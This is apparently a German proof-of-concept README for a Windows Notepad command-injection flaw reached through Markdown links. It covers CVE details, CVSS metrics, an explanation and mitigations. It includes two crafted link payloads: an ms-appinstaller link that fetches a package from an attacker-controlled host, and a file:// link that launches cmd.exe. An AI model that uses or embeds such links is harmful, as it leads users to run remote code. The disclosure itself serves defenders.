
Proof-of-Concept, das eine Befehlsinjektion in Windows-Editor (Notepad) über manipulierte Markdown-Links demonstriert und so die Ausführung von Remote-Code ermöglicht. Enthält Angriffsvektoren, CVSS-Metriken und Anleitungen zur Behebung.
| Feld | Detail |
|---|
| CVE-ID | CVE-2026-20841 |
| Titel | Schwachstelle zur Remote-Codeausführung in der Windows-Notepad-App |
| Auswirkung | Remote-Codeausführung |
| Maximaler Schweregrad | Wichtig |
| CVSS v3.1 Basis / Zeitwert | 8.8 / 7.7 |
| CVSS-Vektor | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C |
| CWE | CWE-77: Unzureichende Neutralisierung spezieller Elemente in einem Befehl („Befehlsinjektion“) |
| Betroffenes Produkt | Windows-Notepad-App (Microsoft-Store-Version, Builds vor 11.2510) |
| Zuweisende CNA | Microsoft |
| Veröffentlicht | 10. Februar 2026 |
| Öffentlich bekannt gegeben | Nein |
| Ausgenutzt | Nein |
| Bewertung der Ausnutzbarkeit | Ausnutzung weniger wahrscheinlich |
Eine unzureichende Neutralisierung spezieller Elemente in einem Befehl („Befehlsinjektion“) in der Windows-Notepad-App ermöglicht es einem nicht autorisierten Angreifer, Code über ein Netzwerk auszuführen.
Die moderne Windows-Notepad-App (über den Microsoft Store verteilt) hat Unterstützung für die Markdown-Darstellung eingeführt, die auch klickbare Hyperlinks umfasst. Die Schwachstelle besteht darin, dass Notepad URI-Schemata in Markdown-Links vor der Verarbeitung nicht ordnungsgemäß validiert und bereinigt. Ein Angreifer kann eine bösartige .md-Datei mit speziell gestalteten Links erstellen, die beim Anklicken durch den Benutzer unverifizierte Protokoll-Handler auslösen, um entfernte Inhalte zu laden und auszuführen.
| Metrik | Wert |
|---|---|
| Angriffsvektor | Netzwerk |
| Angriffskomplexität | Niedrig |
| Erforderliche Privilegien | Keine |
| Benutzerinteraktion | Erforderlich |
| Scope | Unverändert |
| Vertraulichkeitsauswirkung | Hoch |
| Integritätsauswirkung | Hoch |
| Verfügbarkeitsauswirkung | Hoch |
| Metrik | Wert |
|---|---|
| Reifegrad des Exploit-Codes | Unbewiesen |
| Abhilfemaßnahmen | Offizieller Fix |
| Berichtsvertrauen | Bestätigt |
Wie könnte ein Angreifer diese Schwachstelle ausnutzen?
Ein Angreifer könnte einen Benutzer dazu verleiten, einen bösartigen Link in einer in Notepad geöffneten Markdown-Datei anzuklicken, wodurch die Anwendung unverifizierte Protokolle startet, die entfernte Dateien laden und ausführen.
Was ist der Zielkontext der Remote-Codeausführung?
Gemäß der CVSS-Metrik ist der Angriffsvektor Netzwerk (AV:N) und eine Benutzerinteraktion ist erforderlich (UI:R). Der bösartige Code würde im Sicherheitskontext des Benutzers ausgeführt, der die Markdown-Datei geöffnet hat, wodurch der Angreifer dieselben Berechtigungen wie dieser Benutzer erhält.
.md), die bösartige Hyperlinks enthält.ms-appinstaller://), die entfernte Payloads abrufen und ausführen können, oder file://-URIs, die direkt lokale ausführbare Dateien starten können.Haftungsausschluss: Dieser Proof of Concept dient ausschließlich zu Bildungs- und autorisierten Sicherheitsforschungszwecken. Verwenden Sie ihn nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben. Unbefugter Zugriff auf Computersysteme ist illegal und strafbar.
Der PoC demonstriert zwei Angriffsvektoren über manipulierte Markdown-Links:
Vektor 1 – Installation entfernter Payloads durch Missbrauch von Protokoll-Handlern:
[Klicken Sie hier, um das Dokument anzuzeigen](ms-appinstaller://?source=https://attacker-controlled-domain/malicious.appx)
Vektor 2 – Aufruf lokaler ausführbarer Dateien über Datei-URI:
[Klicken Sie hier](file://C:/windows/system32/cmd.exe)

.md-Dateien aus nicht vertrauenswürdigen Quellen in Notepad.Die in diesem Repository bereitgestellten Informationen dienen ausschließlich Bildungs- und autorisierten Sicherheitsforschungszwecken. Dieser Proof of Concept wird geteilt, um Verteidigern zu helfen, die Schwachstelle zu verstehen und zu entschärfen. Der Autor ist nicht verantwortlich für jeglichen Missbrauch der hier bereitgestellten Informationen oder Werkzeuge. Holen Sie immer eine ordnungsgemäße schriftliche Genehmigung ein, bevor Sie Systeme auf Schwachstellen testen. Unbefugter Zugriff auf Computersysteme ist in den meisten Rechtsordnungen eine Straftat. Verwenden Sie dies verantwortungsvoll und ethisch.